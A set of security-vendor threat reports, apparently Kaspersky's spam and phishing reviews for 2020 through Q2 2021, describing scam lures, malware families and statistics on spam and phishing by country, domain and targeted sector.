In fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting Friends: The Reunion, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.

Messenger spam: WhatsApp with that?

In messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.

WhatsApp was bought by Facebook in 2014. In early 2021, the two companies’ symbiotic relationship became a hot topic in connection with WhatsApp’s new privacy policy, allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with “beautiful strangers”. But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.

Emails with a link pointing to a fake WhatsApp voice message most likely belong to the same category. By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.

Investments and public property scams

Offers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas surfaced also in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims’ money.

For more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees, promising to compensate victims’ losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the “anti-fraudsters” was not without strings attached, despite the advertised free consultation. “Clients” who filled out the form were asked to pay a small fee for the refund, whereupon the “consultants” vanished without compensating so much as a dime.

Another high-earning scam cited client payouts under VTB Invest, VTB Bank’s digital asset management solution. Using the bank’s logos, the fraudsters offered “active banking users” the opportunity to receive “payout from investors.” After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they are to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the “payout” the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.

Statistics: spam

Proportion of spam in mail traffic

After a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.

Share of spam in global mail traffic, Q1 and Q2 2021 (download)

A look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.

Source of spam by country

The TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contribution to the global flow of spam decreased slightly. China (7.78%) remains in fourth position.

Source of spam by country, Q2 2021 (download)

The Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).

Malicious mail attachments

Mail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.

Number of Mail Anti-Virus triggerings, Q1 and Q2 2021 (download)

Peak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest with only 10.4 million.

Malware families

In Q2, Trojans from the Badun family (7.09%) were the most common malicious attachments in spam, with their share increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, Agesla Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The Taskun family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. These Trojans, like Badun, are gaining popularity.

TOP 10 malware families in mail traffic, Q2 2021 (download)

Exploits for CVE-2017-11882 (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious ISO disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect any (2.66%) or only 32-bit (2.47%) versions of Windows. Androm backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the SAgent (2.42%) and Agent (2.11%) families.

TOP 10 malicious attachments, Q2 2021 (download)

The TOP 10 attachments in spam differs only slightly from the ranking of malware families. The most widespread representative of Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the Crypt family (2.06%), which includes heavily obfuscated and encrypted programs.

Countries targeted by malicious mailings

More than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.

Countries targeted by malicious spam, Q2 2021 (download)

Further down in the Top 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).

Statistics: phishing

In phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.

Geography of phishing attacks

Looking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top. It didn’t get far ahead from Israel (6.55%) and France (6.46%), which topped the Q1 list.

Geography of phishing attacks, Q2 2021 (download)

Top-level domains

The traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.

Top-level domain zones most commonly used for phishing, Q2 2021 (download)

The fourth most popular domain zone among cybercriminals in Q2 was China’s CN (3.77%), followed by NET (3.53%). Russia’s RU (2.98%) dropped to sixth place, and Tokelau’s TK (1.65%) to eighth. Note also the cybercriminals’ preference for international domain zones (six of the ten lines in this quarter’s ranking).

Organizations under attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

For the first time since the start of the pandemic, online stores (19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter’s leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. in Q2.

Distribution of organizations whose users were targeted by phishers, by category, Q2 2021 (download)

Overall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).

Conclusion

In Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.

As for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren’t enough, fraudsters could start utilizing newly identified strains of the virus to add variety and nowness to their schemes. What’s more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. Such events are always accompanied by thematic spam.

Quarterly highlights

Banking phishing: new version of an old scheme

In Q1 2021, new banking scams appeared alongside ones that are more traditional. Clients of several Dutch banks faced a phishing attack using QR codes. The fraudsters invited the victim to scan a QR code in an email, ostensibly to unblock mobile banking. In actual fact, scanning the code resulted in a data leak, money theft or device infection, if it contained a link to a web page with malware.

To lure users to their sites, phishers exploited the COVID-19 topic. In particular, in a newsletter purporting to be from the MKB bank, recipients were asked to catch up on the latest news about the pandemic and measures taken by the bank. The link pointed to a fake Outlook authorization page.

This past year, cybercriminals have actively exploited the topic of government payouts, most often in relation to damage caused by the pandemic. In Q1 2021, scammers imitating bank emails began to focus on compensation. The links in their messages took the victim to a well-designed phishing pages with official emblems, business language and references to relevant laws. The attacks were mostly aimed at stealing any card details and personal data.

However, users of specific banks were also targeted. In this case, the focus was on copying the external attributes of the bank’s website to create a near-indistinguishable phishing version.

Vaccine with cyberthreat

COVID-19 vaccination was one of the hottest global topics, and hence highly attractive to scammers. Cybercriminals took advantage of people’s desire to get vaccinated as quickly as possible. For instance, some UK residents received an email that appeared to come from the country’s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link.

In another mailing, the attackers focused on age — people over 65 were asked to contact a clinic to receive a vaccine.

In both cases, to make a vaccination appointment, a form had to be filled out with personal data; and in the first case, the phishers also wanted bank card details. If the victim followed all the instructions on the fake website, they handed their money and personal data to the attackers.

Another way to gain access to users’ personal data and purse strings was through fake vaccination surveys. Scammers sent out emails in the name of large pharmaceutical companies producing COVID-19 vaccines, or of certain individuals. The message invited the recipient to take part in a short survey.

Participants were promised a gift or cash reward for their help. After answering the questions, the victim was redirected to a page with the “gift.”

Having consented to receive the prize, the user was asked to fill out a detailed form with personal information. In some cases, the attackers also asked for payment of a token amount for delivery. However, if the victim went ahead and entered their bank card details, the amount charged was several times higher. Needless to say, no gift materialized.

The vaccination topic could hardly be ignored by spammers offering services on behalf of Chinese manufacturers. The emails mentioned lots of products related to diagnosis and treatment of the virus, but the emphasis was on the sale of vaccination syringes.

Such offers may look very favorable, but the likelihood of a successful deal is zero. Most if not all of the time, the “business partners” simply vanish into thin air after receiving the agreed prepayment.

Corporate segment: on-the-job fraud

Corporate usernames and passwords remain a coveted prize for scammers. To counter people’s increasingly wary attitude to emails from outside, attackers try to give their mailings a respectable look, disguising them as messages from business tools and services. By blending into the workflow, the scammers calculate that the user will be persuaded to follow the link and enter data on a fake page. For example, a “notification” from Microsoft Planner invited the user to review their tasks for the coming month. The link redirected them to a phishing page requesting their Microsoft account credentials.

In the Runet (Russian internet), we found an email seemingly from the support department of an analytics portal. The messages talked about recent updates and suggested checking the availability of the resource. The link also required entering corporate account credentials.

Old techniques, such as creating a unique fake page using JavaScript, were combined in Q1 with overtly business-themed phishing emails. If previously scammers used common, but not always business-oriented services as bait, the new batch of emails cited an urgent document awaiting approval or contract in need of review.

Every little bit helps

Since the end of last year, we have observed fraudulent emails and fake pages urging users to pay a small sum for certain services. The payment indicated in the fake email was often so tiny that the potential victim could ignore the risks. For example, in one of the emails below, the cybercriminals ask for just 1.99 rubles (US$0.027). The calculation was simple: users would be less averse to paying a small amount than a larger one, which means more potential victims willing to enter card details on the bogus site. To make the emails more convincing, they imitated commonly used services. For example, delivery services — messages from which are often faked — led the field. The potential victim was asked to pay for customs clearance or package delivery. However, the scammers did not fake the courier service emails very well: they were readily given away by the address in the From field or by the invalid tracking number indicated in the email.

Besides delivery, scammers found other reasons for mailing out “invoices.” In particular, fake notifications about payment for domain usage or even an expired WhatsApp subscription did the rounds. In the latter case, the very mention of a paid subscription should sound an alarm, since even the business version of WhatsApp is free.

Although the scammers asked for a token payment in the email, in reality, if successful, they siphoned off far more than that from the victims’ account, and swiped their bank card details. This danger is ever-present when entering data on dubious websites.

Intrigue: emails from strangers

In March, we identified a targeted mailing to the addresses of an educational institution. The email reported a hack of the database of the school’s partner company, which resulted in the intruders getting their hands on the personal data of students and employees. The company refused to pay the ransom, so now the school administration must prepare for the worst: the data might find its way onto darknet, and from there to even worse criminals, who could use it to enter the school building under the guise of an employee. To convince the school leaders of the reality of the looming threat, the email authors advised clicking the provided link and viewing a portion of the stolen database. The link led to a site in the .onion domain, which can only be opened using the Tor browser. Behind the link was a C&C server that was accessed by malware (various ransomware, including Trojan-Banker.Win32.Danabot). A link to this resource was also contained in ransom messages from the attackers, and in some cases malware was downloaded from it. If a curious employee visited this resource, they risked launching the ransomware in the school’s network or facing a demand to pay the ransom on behalf of the partner company.

Cybercriminals adopted an interesting tactic to attack Facebook users. The potential victim received an email saying that their account had violated the social network’s terms of use. To avoid the account being deleted, the scammers advised the recipient to follow the link and lodge an appeal. At the same time, the window for doing so was very short so as to hurry the victim into acting quickly without scrutinizing the message. The email would have been no different from any other aimed at stealing Facebook credentials, but for one nuance: the link in the message pointed to an actual Facebook page.

Resembling an official notice, the page stated that an erroneous decision to block an account could be disputed by following the link provided. In reality, it was a note in a Facebook user’s profile, which the sharp-eyed user could have discerned from the word “notes” in the address. Clicking the link in the note took the victim straight to a phishing site. The attackers’ calculation was simple: first lull the victim’s vigilance with a legitimate link, then get them to enter their credentials on a fake page.

Statistics: spam

Proportion of spam in mail traffic

In Q1 2021, the share of spam in global mail traffic continued to decline and averaged 45.67%, down 2.11 p.p. against Q4 2020 (47.78%).

Proportion of spam in global email traffic, Q4 2020 and Q1 2021 (download)

The highest percentage of junk mail was recorded in January (46.12%). This is 0.71 p.p. less than the lowest figure in 2020 (46.83%). The calmest month was March, in which spam accounted for only 45.10% of all emails.

In the Runet, the average share of spam was also lower than in Q4 48.56% versus 50.25%. As was generally the case worldwide, the most turbulent month of the reporting period was January (49.76%), and the quietest was March (47.17%). In contrast to the global picture, January’s share of spam in the Runet was 1.30 p.p. higher than December’s (49.76% versus 48.46%).

Proportion of spam in Runet mail traffic, Q4 2020 and Q1 2021 (download)

Sources of spam by country

In 2020, Russia and Germany led the pack by volume of outgoing spam. In Q1 2021, they remained out in front: Russia accounted for 22.47% of spam, and Germany’s share was 14.89%. Third place went to the US (12.98%), and fourth to China (7.38%).

Sources of spam by country, Q1 2021 (download)

The Netherlands (4.18%) ranked fifth, followed by France (3.69%) and Spain (3.39%). Poland (2.39%), Brazil (2.37%) and Japan (2.23%) round out the Top 10.

Malicious mail attachments

In Q1 2021, Kaspersky solutions detected 38,195,315 malicious mail attachments. This is almost 3 million fewer than in the last three months of 2020. That said, the number of attachments blocked by Mail Anti-Virus grew during the quarter.

Number of Mail Anti-Virus triggerings, Q4 2020 and Q1 2021 (download)

Malware families

The most common Trojans detected by our solutions in mail attachments came from the Agensla family (8.91%). These malicious programs specialize in stealing credentials from browsers, as well as from mail and FTP clients. In second place came exploits for the CVE-2017-11882 vulnerability in the Microsoft Equation Editor component, which were detected in 6.38% of cases. Third position this time was taken by Trojans from the Badun family (5.79%). Malicious programs disguised as e-documents are detected with this verdict. Malware from the Badun family most often spreads through archives.

Top 10 malware families in mail traffic, Q1 2021 (download)

Fourth place went to SAgent (4.98%) — documents containing a VBA script that runs PowerShell to covertly download other malware. The fifth- and sixth-placed families are Taskun (3.79%) — programs that create malicious tasks in Windows Task Scheduler, and ISO (3.69%) — malicious disk images distributed by email. In seventh place is the Noon spyware (2.41%), which steals passwords from browsers and reads keystrokes. In eighth is the Crypt family (2.16%), which consists of highly obfuscated or encrypted software. The Top 10 is rounded out by Androm backdoors (2.05%) and worms coded in Visual Basic (1.66%).

Top 10 malicious attachments, Q1 2021 (download)

The Top 10 most common malicious attachments in Q4 corresponds exactly to the ranking of families. This suggests that each of the above-described families was widespread largely due to one member.

Countries targeted by malicious mailings

Our solutions registered the largest number of attempts to open malicious attachments in Spain (8.74%). This country was the top malicious mailing target throughout 2020, and held on to first place in this reporting quarter. Italy (7.59%) moved up to second place, and third place went to Germany (5.84%).

Countries targeted by malicious mailings, Q1 2021 (download)

In fourth position in Q1 was the UAE (5.25%), with Russia (4.88%) closing out the Top 5.

Statistics: phishing

In Q1 2021, our Anti-Phishing system prevented 79,608,185 attempted redirects to fraudulent websites. 5.87% of Kaspersky users encountered phishing, and 695,167 new masks were added to the anti-phishing databases.

Geography of phishing attacks

This quarter, phishing attacks affected a relatively small proportion of our users, both overall and in specific countries. The leader was France, where 9.89% of all users of Kaspersky solutions tried to follow a fraudulent link at least once during the reporting period.

Distribution of phishing attacks by country, Q1 2021 (download)

Israel placed second and Hungary third, where 8.45% and 8.27% of users, respectively, encountered phishing pages. Meanwhile, Brazil (7.94%), which topped the rating in 2020, only managed ninth position in Q1.

Top-level domains

As usual, the largest share of phishing sites that users attempted to visit in the period January–March 2021 were located in the .com domain zone (32.80%). The second most popular domain among scammers this time around was .xyz (11.38%). Bronze goes to the .tk domain zone (3.24%), belonging to the Tokelau Islands, a dependent territory of New Zealand, in the Pacific Ocean. Tokelau domains are cheap to rent, and so popular with phishers.

Top-level domain zones most commonly used for phishing, Q1 2021 (download)

Also prevalent this quarter were phishing sites that were not assigned domain names (2.78%). Such resources were the fourth most popular. In fifth spot, just 0.01 p.p. behind, was the Russian domain .ru (2.77%).

Organizations under attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

The Top 10 organizations used by phishers as bait remained practically unchanged in Q1 relative to 2020. Online stores (15.77%) still lead the way, followed by global internet portals (15.50%) and banks (10.04%). Fraudsters’ continued targeting of users of electronic trading platforms is explained by the pandemic-related restrictions that remained in force in many countries this quarter.

Distribution of organizations targeted by phishers, by category in Q1 2021 (download)

Conclusion

In Q1 2021, we largely saw a continuation of the 2020 trends. Cybercriminals are still actively using the COVID-19 theme to entice potential victims. And as coronavirus vaccination programs have been rolled out, spammers have adopted it as bait. Corporate account hunters continue to hone their techniques to make their emails as convincing as possible. Meanwhile, phishers who prey on personal accounts are still actively spoofing the websites of online stores, which have risen in popularity due to the pandemic.

Attackers will likely carry on exploiting the COVID-19 vaccination topic in Q2. Moreover, we can expect new fraudulent schemes to emerge. Scams related to compensation for damages caused to individuals and companies worldwide will not go away any time soon, too. Moreover, Q2 may see an associated rise in the number of fraudulent schemes offering payments from governments or other structures. And as the summer season approaches, an increase in the number of emails related to tourism is possible; however, due to the pandemic, it is likely to be small. On the other hand, cybercriminals will almost certainly continue to actively hunt corporate account credentials, exploiting the fact that many companies are still in remote working mode and communication among employees is predominantly online.

Figures of the year

In 2020:

• The share of spam in email traffic amounted to 50.37%, down by 6.14 p.p. from 2019.
• Most spam (21.27%) originated in Russia.
• Kaspersky solutions detected a total of 184,435,643 malicious attachments.
• The email antivirus was triggered most frequently by email messages containing members of the Trojan.Win32.Agentb malware family.
• The Kaspersky Anti-Phishing component blocked 434,898,635 attempts at accessing scam sites.
• The most frequent targets of phishing attacks were online stores (18.12 per cent).

Trends of the year

Contact us to lose your money or account!

In their email campaigns, scammers who imitated major companies, such as Amazon, PayPal, Microsoft, etc., increasingly tried to get users to contact them. Various pretexts were given for requesting the user to get in touch with “support”: order confirmation, resolving technical issues, cancellation of a suspicious transaction, etc. All of these messages had one thing in common: the user was requested to call a support number stated in the email. Most legitimate messages give recipients constant warnings of the dangers of opening links that arrive by email. An offer to call back was supposed to put the addressees off their guard. Toll-free numbers were intended to add further credibility, as the support services of large companies often use these. The scammers likely expected their targets to use the provided phone number to get help instantly in a critical situation, rather than to look for a contact number or wait for a written response from support.

The contact phone trick was heavily used both in email messages and on phishing pages. The scammers were simply betting on the visitor to turn their attention to the number and unsettling warning message against the red background, rather than the address bar of the fake website.

We assume that those who called the numbers were asked to provide the login and password for the service that the scammers were imitating, or to pay for some diagnostics and troubleshooting services.

Reputation, bitcoins or your life?

In 2020, Bitcoin blackmailers stuck to their old scheme, demanding that their victims transfer money to a certain account and threatening adversity for failure to meet their demands. Threats made by extortionists grew in diversity. In most cases, scammers, as before, claimed to have used spyware to film the blackmail victim watching adult videos. In a reflection of the current trends for online videoconferencing, some email campaigns claimed to have spied on their victims with the help of Zoom. This year, too, blackmailers began to take advantage of news sensations to add substance to their threats. This is very similar to the techniques of “Nigerian” scammers, who pose as real political figures or their relatives, offering tons of money, or otherwise link their messages with concurrent global events. In the case of bitcoin blackmail, the media component was supposed to be a strong argument in the eyes of the victim for paying the ransom without delay, so cybercriminals cited the example of media personalities whose reputation suffered because of an explicit video being published.

This year, we have seen threats made against companies, too. A company was told to transfer a certain amount to a Bitcoin wallet to prevent a DDoS attack that the cybercriminals threatened to unleash upon it. They promised to provide a demonstration to prove that their threats were real: no one would be able to use the services, websites or email of the company under attack for thirty minutes. Interestingly, the cybercriminals did not limit their threats to DDoS. As with blackmail aimed at individuals, they promised to damage the company’s reputation even more, should it fail to pay up, by stealing confidential information, specifically, its business data. The attackers introduced themselves as well-known APT groups to add weight to their threats. For example, in the screenshot below, they call themselves Venomous Bear, also known as Waterbug or Turla.

The senders of an email that talked about a bomb planted in company’s offices went much further with their threats. The amount demanded by the blackmailers was much larger than in previous messages: $20,000. To make their threats sound convincing enough, the cybercriminals provided details of the “attack”: an intention to blow up the bomb if the police intervened, the substance used, the explosive yield and plans to threaten other blackmail victims with the explosion.

Attacks on the corporate sector

Theft of work accounts and infecting of office computers with malware in targeted attacks are the main risk that companies have faced this year. Messages that imitated business email or notifications from major services offered to view a linked document or attached HTML page. Viewing the file required entering the password to the recipient’s corporate email account.

Reasons given for asking users to open a link or attachment could be varied: a need to install an update, unread mail, quarantined mail or unread chat messages. The cybercriminals created web pages that were designed to look like they belonged to the company under attack. URL parameters including the corporate email address were pushed to the fake page with the help of JavaScript. This resulted in the user seeing a unique page with a pre-entered email address and a design generated to imitate the company’s corporate style. The appearance of that page could lull the potential victim into a false sense of security, as all they needed to do was enter their password.

During this type of attacks scammers began to make broader use of “voice messaging”. The appearance of the messages imitated business email.

The link could lead directly to a phishing site, but there also was a more complex scenario, in which the linked page looked like an audio player. When the recipient tried playing the file, they were asked to enter the credentials for their corporate mailbox.

Demand for online videoconferencing amid remote work led to a surge in fake online meeting invitations. A significant distinctive feature, which should have alarmed the recipients of the fake invitations, were the details that the page was asking them to enter in order to join the meeting. To access a real Zoom meeting, you need to know the meeting ID and password. The fake videoconference links opened fake Microsoft and WeTransfer pages, which contained fields for entering the login and password for a work account.

Messengers targeted

Scammers who were spreading their chain mail via social networks and instant messaging applications began to favor the latter. Message recipients, mostly in WhatsApp, were promised a discount or prize if they opened a link sent to them. The phishing web page contained a tempting message about a money prize, award or other, equally desirable, surprises.

The recipient had to fulfill two conditions: answer a few simple questions or fill out a questionnaire, and forward the message to a certain number of their contacts. Thus, the victim turned into a link in the spam chain, while subsequent messages were sent from a trusted address, thus avoiding anti-spam filters.

Besides that, a message from someone that the recipient knew would have much more credibility. Thus, the chain continued to grow, and the scammers went on enriching themselves. After all, even if the victim did fulfill the conditions, getting that promised prize proved not so simple, as the “lucky” recipient was urged to pay bank commission.

COVID-19

“Public relief” by spammers

Many governments did their best to help citizens during the pandemic. That initiative, together with the fact that people on the whole were willing to get payouts, became a theme for spam campaigns. Both individuals and companies were exposed to the risk of being affected by cybercriminals’ schemes.

Messages offering financial aid to businesses hurt by the pandemic or to underprivileged groups could crop up in social media feeds or arrive through instant messaging networks. The main requirement for getting the funds was filling out a detailed personal questionnaire. Those who took the step found that a small commission was required as well. Real government payouts these days are made through public portals that also serve other purposes and do not require additional registration, questionnaires or commissions.

Cybercriminals who offered tax deductions to companies employed a similar scheme. As in the examples above, the reason provided for the easing of tax policy was the pandemic, and in particular, anticipation of a second wave of COVID-19.

However, offers of tax deductions and compensations were hiding not just the danger of losing money but losing one’s account to the scammers, too, as many of the messages contained phishing links.

Malicious links

Email campaigns that promised compensation could also threaten computer security. Messages in Turkish, just as those mentioned earlier, offered a payout from Turkey’s Ministry of Health – not always mentioned by name – but getting the money required downloading and installing an APK file on the recipient’s smartphone. The attack was targeting Android users, and the downloadable application contained a copy of the Trojan-Dropper.AndroidOS.Hqwar.cf.

A fear of being infected with a new virus and a desire to know as much as possible about it could prompt recipients to review the email and open the links that it contained, as long as the message had been sent by a well-known organization. Fake letters from the WHO purporting to contain the latest safety advice were distributed in a variety of languages. The attachment contained files with various extensions. When the recipient tried to open these, malware was loaded onto the computer. In the message written in English, the attackers spread the Backdoor.Win32.Androm.tvmf, and in the one written in Italian, the Trojan-Downloader.MSOffice.Agent.gen.

Viral postal services

COVID-19 was also mentioned in fake email messages that mimicked notifications from delivery services. The sender said that there was a problem with delivering an order due to the pandemic, so the recipient needed to print out the attachment and take it to the nearest DHL office. The attached file contained a copy of the HEUR:Trojan.Java.Agent.gen.

The corporate sector

Spam that targeted companies also exploited the COVID-19 theme, but the cybercriminals occasionally relied on a different kind of tricks. For example, one of the emails stated that technical support had created a special alert system to minimize the risk of a new virus infection. All employees were required to log in to this system using their corporate account credentials and review their schedules and tasks. The link opened a phishing page disguised as the Outlook web interface.

In another instance, scammers were sending copies of the HEUR:Trojan-PSW.MSIL.Agensla.gen in the form of an email attachment. The scammers explained that the recipient needed to open the attached file, because the previous employee, who was supposed to send the “documentation”, had quit over COVID-19, and the papers had to be processed within three days.

“Nigerian” crooks making money from the pandemic

Email from “Nigerian” scammers and fake notifications of surprise lottery winnings regularly tapped the pandemic theme. The message in Korean shown below says that the recipient’s email address had been selected randomly by some center in Istanbul for a coronavirus-related emergency payout. Such surprise notices of winnings and compensations were generally sent out in a variety of languages. Messages from some lucky individuals who had won a huge sum and wished to support their fellow creatures in the difficult times of the pandemic were another variation on the “Nigerian” scam.

Where messages were signed as being from a lawyer trying to find a new owner for no-man’s capital, the sender emphasized that the late owner of the fortune had died of COVID-19.

An unusual turn of events

Regular “Nigerian” scam email is easy to recognize: it talks about millionaires or their relatives trying to inherit a huge fortune or bequeath it to someone who bears the same last name. The public seems to have become so accustomed to that type of junk mail that it has ceased to react, so cybercriminals have come up with a new cover story. To avoid being found out right away, they refrain from mentioning astronomical sums of money, instead posing as a mother from Russia who is asking for help with her daughter’s effort to collect postcards from around the world. The key point of this kind of messages is to get the potential victim to reply: the “mother’s” request sounds absolutely innocent and easy to do, so it can resonate with recipients. If the victim agrees to send a postcard, they are in for a lengthy email exchange with the scammers, who will offer them to partake in a large amount of money by paying a small upfront fee.

“Nigerian” scammers are not the only ones that have been getting creative. Spammers who sent out their messages through website feedback forms employed yet another unusual trick. The messages were signed as being from an outraged graphic artist or photographer, their names changing with each new message. The sender insisted that the website contained their works and thus violated their copyright, and demanded that the content be taken down immediately, threatening legal action.

The deadline for meeting the demand was quite tight, as the scammers needed the victim to open the link as soon as possible, while pondering on the consequences of that action as little as possible. A law-abiding site owner was likely to do just that. This is confirmed by related discussions in various blogs, with the users reporting that they immediately tried checking what photographs they had “stolen”. The links were not functional at the time the “complaints” were discovered, but in all likelihood, they had previously linked to malicious files or phishing programs.

Statistics: spam

Proportion of spam in email traffic

The share of spam in global email traffic in 2020 was down by 6.14 p.p. when compared to the previous reporting period, averaging 50.37%.

Proportion of spam in global email traffic, 2020 (download)

The percentage of junk mail gradually decreased over the year, with the highest figure (55.76%) recorded in January and the lowest (46.83%), in December. This may be due to the universal transition to remote work and a resulting increase in legitimate email traffic.

Sources of spam by country

The group of ten countries where the largest volumes of spam originated went through noticeable change in 2020. United States and China, which had shared first and second places (10.47% and 6.21%, respectively) in the previous three years, dropped to third and fourth. The “leader” was Russia, which was the source of 21.27% of all spam email in 2020. It was followed by Germany (10.97%), which was just 0.5 percentage points ahead of the United States.

Sources of spam by country in 2020 (download)

France gained 2.97 p.p. as compared to the year 2019, remaining fifth with 5.97%, while Brazil lost 1.76 p.p. and sunk to seventh place with 3.26%. The other countries in last year’s “top ten”, India, Vietnam, Turkey and Singapore, dropped out, giving way to the Netherlands (4.00%), which skipped to sixth place, Spain (2.66%), Japan (2.14%) and Poland (2.05%).

Malicious email attachments

Attacks blocked by the email antivirus in 2020 (download)

In 2020, our solutions detected 184,435,643 dangerous email attachments. The peak in malicious activity, 18,846,878 email attacks blocked, fell on March, while December was the quietest month, with 11,971,944 malicious attachments, as it was in 2019.

Malware families

TOP 10 malware families in 2020 (download)

Members of the Trojan.Win32.Agentb family were the most frequent (7.75%) malware spread by spammers. The family includes backdoors, capable of disrupting the functioning of a computer, and copying, modifying, locking or deleting data. The Trojan-PSW.MSIL.Agensla family was second with 7.70%. It includes malware that steals data stored by the browser, as well as credentials for FTP and email accounts.

Equation Editor vulnerability exploits, Exploit.MSOffice.CVE-2017-11882, dropped to third place with 6.55 percent. This family had topped the ranking of malware spread through spam in the previous two years.

Trojan.MSOffice.SAgent malicious documents dropped from second to fourth place with 3.41%. These contain a VBA script, which runs PowerShell to download other malware secretly.

In fifth place, with 2.66%, were Backdoor.Win32.Androm modular backdoors, which, too, are frequently utilized for delivering other malware to an infected system. These were followed by the Trojan.Win32.Badun family, with 2.34%. The Worm.Win32.WBVB worms, with 2.16%, were seventh. Two families, in eighth and ninth place, contain malware that carefully evades detection and analysis: Trojan.Win32.Kryptik  trojans, with 2.02%, use obfuscation, anti-emulation and anti-debugging techniques, while Trojan.MSIL.Crypt trojans, with 1.91%, are heavily obfuscated or encrypted. The Trojan.Win32.ISO family, with 1.53%, rounds out the rankings.

TOP 10 malicious email attachments in 2020 (download)

The rankings of malicious attachments largely resemble those of malware families, but there are several subtle differences. Thus, our solutions detected the exploit that targeted the CVE-2017-11882 vulnerability more frequently (6.53%) than the most common member of the Agensla family (6.47%). The WBVB worm, with 1.93%, and the Kryptik trojan, with 1.97%, switched positions, too. Androm-family backdoors missed the “top ten” entirely, but the Trojan-Spy.MSIL.Noon.gen, with 1.36%, which was not represented in the families rankings, was tenth.

Countries targeted by malicious mailshots

Spain was the main target for malicious email campaigns in 2020, its share increasing by 5.03 p.p. to reach 8.48%. As a result of this, Germany, which had topped the rankings since 2015, dropped to second place with 7.28% and Russia, with 6.29%, to third.

Countries targeted by malicious mailshots in 2020 (download)

